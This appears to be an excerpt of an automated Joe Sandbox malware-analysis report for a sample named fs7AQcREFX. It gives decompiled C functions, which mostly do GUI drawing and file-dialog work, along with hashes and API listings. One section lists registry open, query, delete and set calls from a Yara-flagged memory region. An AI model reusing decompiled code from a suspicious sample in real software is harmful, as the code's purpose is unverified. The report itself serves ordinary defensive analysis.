                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$ClientPostScreenSend$CountFromItemMenuPointWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 407895249-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 673d7b9ca702b56d74ff87054300533415ceac18cb508b68536a2d154efa7764
                                                                                                                                                                                                                                                                                          • Instruction ID: 29924ae4a4c784465dd376042350ce2723e62385593ded4fc7ffc19ea50ac598
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 673d7b9ca702b56d74ff87054300533415ceac18cb508b68536a2d154efa7764
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D4159709002199BDB15CF64DD84ABFBBF9FF88700F108529EA55E7A80D7B4A981DB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00102D30(void* __ecx, void* __esi, void* __eflags, struct HDC__** _a4, int _a8, struct HBRUSH__* _a12, struct HDC__* _a16, void* _a20, int _a24, int _a28) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t37;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t53;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t37 = _a4;
                                                                                                                                                                                                                                                                                          				_t53 = CreateCompatibleDC( *_t37);
                                                                                                                                                                                                                                                                                          				_t38 = CreateCompatibleBitmap( *_t37,  *(__esi + 0x90),  *(__esi + 0x94));
                                                                                                                                                                                                                                                                                          				_v8 = SelectObject(_t53, _t38);
                                                                                                                                                                                                                                                                                          				PatBlt(_t53, 0, 0,  *(__esi + 0x90),  *(__esi + 0x94), 0xff0062);
                                                                                                                                                                                                                                                                                          				_t25 = GetSysColor(0x12);
                                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          				ImageList_Draw( *(__esi + 0x48), _a8, _t53, 0, 0, ( ~(_t25 - 0xffffff) & 0xfffffff0) + 0x10);
                                                                                                                                                                                                                                                                                          				E00103960(_a12, _a16, _a4, _a24, _a28,  *(__esi + 0x90),  *(__esi + 0x94), _t53, _a20);
                                                                                                                                                                                                                                                                                          				_t35 = SelectObject(_t53, _v8);
                                                                                                                                                                                                                                                                                          				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                          					_t35 = DeleteObject(_t38);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t53 != 0) {
                                                                                                                                                                                                                                                                                          					_t35 = DeleteDC(_t53);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t35;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x00102d35
                                                                                                                                                                                                                                                                                          0x00102d4f
                                                                                                                                                                                                                                                                                          0x00102d5b
                                                                                                                                                                                                                                                                                          0x00102d70
                                                                                                                                                                                                                                                                                          0x00102d80
                                                                                                                                                                                                                                                                                          0x00102d88
                                                                                                                                                                                                                                                                                          0x00102d98
                                                                                                                                                                                                                                                                                          0x00102dab
                                                                                                                                                                                                                                                                                          0x00102dd6
                                                                                                                                                                                                                                                                                          0x00102de0
                                                                                                                                                                                                                                                                                          0x00102de8
                                                                                                                                                                                                                                                                                          0x00102deb
                                                                                                                                                                                                                                                                                          0x00102deb
                                                                                                                                                                                                                                                                                          0x00102df3
                                                                                                                                                                                                                                                                                          0x00102df6
                                                                                                                                                                                                                                                                                          0x00102df6
                                                                                                                                                                                                                                                                                          0x00102e01

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00102D3C
                                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00102D55
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00102D5F
                                                                                                                                                                                                                                                                                          • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00102D80
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00102D88
                                                                                                                                                                                                                                                                                          • ImageList_Draw.COMCTL32(?,?,00000000,00000000,00000000,-0100000F,?,00102057,?,?,00000000,00000000,?,?,?), ref: 00102DAB
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103960: CreateCompatibleDC.GDI32(00000000), ref: 00103998
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103960: CreateCompatibleDC.GDI32(?), ref: 001039A8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103960: DeleteDC.GDI32(?), ref: 001039C2
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00102DE0
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00102DEB
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00102DF6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CompatibleCreate$DeleteObject$Select$BitmapColorDrawImageList_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3641000976-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 085084421e966289acc2131c8e7711ca9b247a3271213ad333f9064e46ced537
                                                                                                                                                                                                                                                                                          • Instruction ID: d7f8600f62fdeb86867ce0f8997f7cabf440710763e5df3549f4c43ac0629901
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 085084421e966289acc2131c8e7711ca9b247a3271213ad333f9064e46ced537
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63212F71600608AFD714CFA8DD89FAB77BDEB8D740F10860CFA59D3291CA70A8419B30
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                                                                                                                          			E000F69C0(void* __ebx, RECT* __edi, struct HDC__* _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				struct tagENHMETAHEADER _v172;
                                                                                                                                                                                                                                                                                          				intOrPtr _v176;
                                                                                                                                                                                                                                                                                          				intOrPtr _v180;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _v184;
                                                                                                                                                                                                                                                                                          				int _v188;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F175);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t31 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t32 = _t31 ^ _t75;
                                                                                                                                                                                                                                                                                          				_v24 = _t32;
                                                                                                                                                                                                                                                                                          				_push(_t72);
                                                                                                                                                                                                                                                                                          				_push(_t32);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v184 =  *(__ebx + 8);
                                                                                                                                                                                                                                                                                          				_v180 = 0;
                                                                                                                                                                                                                                                                                          				_v176 = 0;
                                                                                                                                                                                                                                                                                          				E00106820( &_v172, 0, 0x6c);
                                                                                                                                                                                                                                                                                          				_v172.iType = 1;
                                                                                                                                                                                                                                                                                          				_v172.nSize = 0x6c;
                                                                                                                                                                                                                                                                                          				GetEnhMetaFileHeader(_v184, 0x6c,  &_v172);
                                                                                                                                                                                                                                                                                          				asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          				_t73 = _t72 &  &_v172;
                                                                                                                                                                                                                                                                                          				_v188 = MulDiv( *(__ebx + 0x14), __edi->right -  *__edi,  *(_t73 + 0x48));
                                                                                                                                                                                                                                                                                          				OffsetWindowOrgEx(_a4,  ~_v188,  ~(MulDiv( *(__ebx + 0x18), __edi->bottom - __edi->top,  *(_t73 + 0x4c))), 0);
                                                                                                                                                                                                                                                                                          				PlayEnhMetaFile(_a4,  *(__ebx + 8), __edi);
                                                                                                                                                                                                                                                                                          				_push(_v180);
                                                                                                                                                                                                                                                                                          				E001062C2();
                                                                                                                                                                                                                                                                                          				_push(_v176);
                                                                                                                                                                                                                                                                                          				_t51 = E001062C2();
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t74);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t51, __ebx, _v24 ^ _t75, _a4, __edi, _t74);
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x000f69c3
                                                                                                                                                                                                                                                                                          0x000f69c5
                                                                                                                                                                                                                                                                                          0x000f69d0
                                                                                                                                                                                                                                                                                          0x000f69d7
                                                                                                                                                                                                                                                                                          0x000f69dc
                                                                                                                                                                                                                                                                                          0x000f69de
                                                                                                                                                                                                                                                                                          0x000f69e1
                                                                                                                                                                                                                                                                                          0x000f69e2
                                                                                                                                                                                                                                                                                          0x000f69e6
                                                                                                                                                                                                                                                                                          0x000f69ee
                                                                                                                                                                                                                                                                                          0x000f69fe
                                                                                                                                                                                                                                                                                          0x000f6a04
                                                                                                                                                                                                                                                                                          0x000f6a0a
                                                                                                                                                                                                                                                                                          0x000f6a10
                                                                                                                                                                                                                                                                                          0x000f6a28
                                                                                                                                                                                                                                                                                          0x000f6a32
                                                                                                                                                                                                                                                                                          0x000f6a3c
                                                                                                                                                                                                                                                                                          0x000f6a47
                                                                                                                                                                                                                                                                                          0x000f6a51
                                                                                                                                                                                                                                                                                          0x000f6a6b
                                                                                                                                                                                                                                                                                          0x000f6a8f
                                                                                                                                                                                                                                                                                          0x000f6a9e
                                                                                                                                                                                                                                                                                          0x000f6aaa
                                                                                                                                                                                                                                                                                          0x000f6aab
                                                                                                                                                                                                                                                                                          0x000f6ab6
                                                                                                                                                                                                                                                                                          0x000f6ab7
                                                                                                                                                                                                                                                                                          0x000f6ac2
                                                                                                                                                                                                                                                                                          0x000f6aca
                                                                                                                                                                                                                                                                                          0x000f6ad8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F6A10
                                                                                                                                                                                                                                                                                          • GetEnhMetaFileHeader.GDI32(?,0000006C,?,?,1F9A9BDF), ref: 000F6A3C
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 000F6A5C
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 000F6A77
                                                                                                                                                                                                                                                                                          • OffsetWindowOrgEx.GDI32(?,1F9A9BDF,00000000,00000000,?,1F9A9BDF), ref: 000F6A8F
                                                                                                                                                                                                                                                                                          • PlayEnhMetaFile.GDI32(?,?), ref: 000F6A9E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileMeta$HeaderOffsetPlayWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                                                                                          • API String ID: 3114738026-2517025534
                                                                                                                                                                                                                                                                                          • Opcode ID: e4e85233323320ed4969e6d0bef9fd8a8aafc0b8205f6e0f2f4ec844915b316a
                                                                                                                                                                                                                                                                                          • Instruction ID: 5fea7794de4a33f95bce3d7b7363feb746eb489444326d75fcbb515615d642fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4e85233323320ed4969e6d0bef9fd8a8aafc0b8205f6e0f2f4ec844915b316a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 693150B1A00318EFDB14DF64CD45FABB7B9EB48300F008699B94997684DB70AA94CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00101120(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                                          				signed int _v88;
                                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t36 = GetParent( *(_a4 + 4));
                                                                                                                                                                                                                                                                                          				_t19 = SendMessageA(_t36, 0x40c, 0, 0);
                                                                                                                                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = _t19;
                                                                                                                                                                                                                                                                                          				if(_t19 <= 0) {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                                          						_v96 = 0x50;
                                                                                                                                                                                                                                                                                          						_v92 = 0x11;
                                                                                                                                                                                                                                                                                          						E00106820( &_v88, 0, 0x48);
                                                                                                                                                                                                                                                                                          						_t39 = _t39 + 0xc;
                                                                                                                                                                                                                                                                                          						if(SendMessageA(_t36, 0x41d, _t37,  &_v96) != 0 && _v64 ==  *(_a4 + 4)) {
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                                                                                                                                          						if(_t37 < _v12) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							L4:
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v88 & 0x00000200) == 0) {
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						PostMessageA(_t36, 0x42b, _t37, 0);
                                                                                                                                                                                                                                                                                          						PostMessageA( *(_a4 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x00101140
                                                                                                                                                                                                                                                                                          0x00101148
                                                                                                                                                                                                                                                                                          0x0010114c
                                                                                                                                                                                                                                                                                          0x0010114e
                                                                                                                                                                                                                                                                                          0x00101153
                                                                                                                                                                                                                                                                                          0x001011e3
                                                                                                                                                                                                                                                                                          0x00101159
                                                                                                                                                                                                                                                                                          0x00101159
                                                                                                                                                                                                                                                                                          0x00101161
                                                                                                                                                                                                                                                                                          0x00101168
                                                                                                                                                                                                                                                                                          0x0010116f
                                                                                                                                                                                                                                                                                          0x00101174
                                                                                                                                                                                                                                                                                          0x00101186
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101193
                                                                                                                                                                                                                                                                                          0x00101197
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101199
                                                                                                                                                                                                                                                                                          0x00101199
                                                                                                                                                                                                                                                                                          0x001011a1
                                                                                                                                                                                                                                                                                          0x001011a1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101197
                                                                                                                                                                                                                                                                                          0x001011ab
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001011ad
                                                                                                                                                                                                                                                                                          0x001011bc
                                                                                                                                                                                                                                                                                          0x001011ce
                                                                                                                                                                                                                                                                                          0x001011d8
                                                                                                                                                                                                                                                                                          0x001011d8
                                                                                                                                                                                                                                                                                          0x001011ab
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00101130
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00101148
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0010116F
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000041D,00000000,00000050), ref: 00101182
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 001011BC
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 001011CE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$PostSend$Parent_memset
                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                          • API String ID: 2781538653-3110715001
                                                                                                                                                                                                                                                                                          • Opcode ID: 7dafaefa66c0e2a133620b5884c2e8ae63b276f118599d9ff1f15caafaa8ea71
                                                                                                                                                                                                                                                                                          • Instruction ID: 1afecaa3b77d4fe2dde6b80b2d4e35189666bd16b621a79751624cae329758e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dafaefa66c0e2a133620b5884c2e8ae63b276f118599d9ff1f15caafaa8ea71
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21A472A402187BD714DB99DC81FEABBA8EB48710F108016FB14AB2C0C7F5A8458BE5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 02527645
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000020), ref: 02527679
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 0252769D
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 025276D2
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 025276E0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction ID: 4796376803244c76c47f99049329ded25a28e7314a61c7c4d9340553cd8cb373
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F3152B0A042599BEB04CFD4D855BBFBBB9BB48704F14415CE600A7281D3B96A04CBA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                          			E000F7370(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				CHAR* _v584;
                                                                                                                                                                                                                                                                                          				CHAR* _v592;
                                                                                                                                                                                                                                                                                          				intOrPtr _v632;
                                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                                          				int _v656;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          				int _t40;
                                                                                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t38 = __edi;
                                                                                                                                                                                                                                                                                          				_t16 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t16 ^ _t42;
                                                                                                                                                                                                                                                                                          				_t33 = __edi + 0x58;
                                                                                                                                                                                                                                                                                          				_v656 = 0;
                                                                                                                                                                                                                                                                                          				E000FACF0( &_v652, __eflags, 0, __edi + 0x58, "All Files (*.*)");
                                                                                                                                                                                                                                                                                          				_v652 = 0x112d54;
                                                                                                                                                                                                                                                                                          				if(E000FADC0(GetActiveWindow(),  &_v652) != 1) {
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					_t40 = _v656;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t40 = E000F7250(_v592, __edi);
                                                                                                                                                                                                                                                                                          					_v656 = _t40;
                                                                                                                                                                                                                                                                                          					if(_t40 == 0) {
                                                                                                                                                                                                                                                                                          						MessageBoxA( *(__edi + 4), "Error writing file!\n", 0x11293e, 0);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t33 = lstrcpyA;
                                                                                                                                                                                                                                                                                          						lstrcpyA(lstrcpyA, _v592);
                                                                                                                                                                                                                                                                                          						lstrcpyA(__edi + 0x15c, _v584);
                                                                                                                                                                                                                                                                                          						_t37 =  *(__edi + 4);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(__edi + 4), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t21 = _v632;
                                                                                                                                                                                                                                                                                          				if(_v632 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t21);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_t40, _t33, _v8 ^ _t42, _t37, _t38, _t40);
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x000f7370
                                                                                                                                                                                                                                                                                          0x000f7379
                                                                                                                                                                                                                                                                                          0x000f7380
                                                                                                                                                                                                                                                                                          0x000f738a
                                                                                                                                                                                                                                                                                          0x000f7396
                                                                                                                                                                                                                                                                                          0x000f73a0
                                                                                                                                                                                                                                                                                          0x000f73a5
                                                                                                                                                                                                                                                                                          0x000f73bd
                                                                                                                                                                                                                                                                                          0x000f740a
                                                                                                                                                                                                                                                                                          0x000f740a
                                                                                                                                                                                                                                                                                          0x000f73bf
                                                                                                                                                                                                                                                                                          0x000f73cb
                                                                                                                                                                                                                                                                                          0x000f73cd
                                                                                                                                                                                                                                                                                          0x000f73d5
                                                                                                                                                                                                                                                                                          0x000f7442
                                                                                                                                                                                                                                                                                          0x000f73d7
                                                                                                                                                                                                                                                                                          0x000f73e5
                                                                                                                                                                                                                                                                                          0x000f73eb
                                                                                                                                                                                                                                                                                          0x000f73f5
                                                                                                                                                                                                                                                                                          0x000f73f7
